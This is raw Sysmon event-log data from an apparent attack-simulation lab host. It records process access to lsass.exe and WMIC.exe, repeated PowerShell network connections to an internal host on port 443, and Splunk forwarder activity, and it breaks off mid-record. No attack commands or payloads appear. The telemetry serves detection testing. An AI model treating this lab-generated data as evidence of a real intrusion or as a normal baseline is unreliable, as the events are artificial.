18:15:59.528{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000035085515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:59.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BD5B67378D1AA9309D87422E8BB6143,SHA256=DF9E9EBB797D7972F19FB71D5B9EE71200C0B5EDEB5E84857EF538E1248212CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:23.372{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56738-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:00.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=312E1438CC1A63CAEAA8C3D1E87A3F08,SHA256=7A03246C95ACEAC670D4049B24FC29140DB55C3D28896528809CEFACACD71630,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:01.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50207C1FE08183AB51F43EB9879337C,SHA256=626067E77AC55635810F1D54DC67B29FF8A3FD2E1A7D14386FE41FED28494EA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:25.554{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56739-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000035085520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:02.335{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=834DC582FB017DF75F2BD688115C3234,SHA256=CE14649CCD2DD2A4B44D60575779C17BDDB3DE8F39F4804413B17A12350EA2B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3BD719676C06345BC7CF611B1AB127FE,SHA256=3E141216DA1AE614231DCB7864BD7C6BB736CA04847341996B2958CCC94B713E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02AF874E6748E725EE3F0219E9E74922,SHA256=1BD668129A2EB9CF8AA5889DDDBD76ED5EF284F4A314AA85033657DB91A14E95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:27.234{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56740-false10.0.1.12-8000- 354300x800000000000000035085525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.375{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56741-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:04.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E37DF80304C145E5C7E9BEBC90EDF13,SHA256=EC22C7A01408F6581EB393C92379DBFC224A25BEF6C055D665713570B7DB2600,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:05.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38E90FBD2E5B66ADB68F97BC0242591,SHA256=90F0C45AE73EAAD590B523F38EB9F8ABB03C3E5FD66E38A79D9C553CB1920845,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:06.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81011C7087696568E1B92DB6AA6D45B2,SHA256=CEB2F13192DCB681DF7D9854178716949B72A280494CB4C7E8CCCF4A30467D42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:07.444{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C5E6DDBD05A69A98645CDAE5B93BDF,SHA256=8C33D28E182BCED6E69B1D23F2360E46A318C73C8A79756D1D426C2B56FFEFE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:08.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332C64A601F47D1BD31ED14DD5835E50,SHA256=1D05FB312A7A1CCBC70B1E58F137BA6952344F2E9DE7877502D66D2EE84E306B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:08.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4FCBB8B0EB2B365F99F1C2C0A5A6E0A7,SHA256=72F0E2A716083E66E63EE07D0C301A9F69D7F7989754D4C468A834E37DD13D38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:09.497{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1163DBF103B8288F686E1E7EEB273F,SHA256=A14629919EF20C1A3BB17541514A1677CCB1CDBE416B94D3B4F58A43F563FFCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.169{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56742-false10.0.1.12-8000- 23542300x800000000000000035085534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:10.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C316B792F9D729FE232F35E982F556,SHA256=CA75FAFE3CF5D26FDB5AB7CAB0A7E7618E82FCB8F32A554947EF4668685E2257,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.385{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56743-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:11.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EAE86D25B9EFB849C0D890DFB7232F7,SHA256=4902301037AA338EE5CD154ACF82A734CCBDD6697C422C51640ABD3BCBB91182,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:12.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEADE00947D51D9E1ADD58B399AA39C3,SHA256=FE407FFEF71C8AF02E3F495BEC28B44032A588FDBF6ADAFF03A88BA18007AA84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.694{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.678{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.674{B81B27B7-4F6D-613A-6A90-03000000C801}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03502D50DC2F87496A3313CC487F1684,SHA256=F73375E579184EA434FC439CA1564A72FA79C1565A00A8E0BCBA3283267015FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.425{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.425{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.409{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.409{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.409{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F6D-613A-6990-03000000C801}2812C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:13.394{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 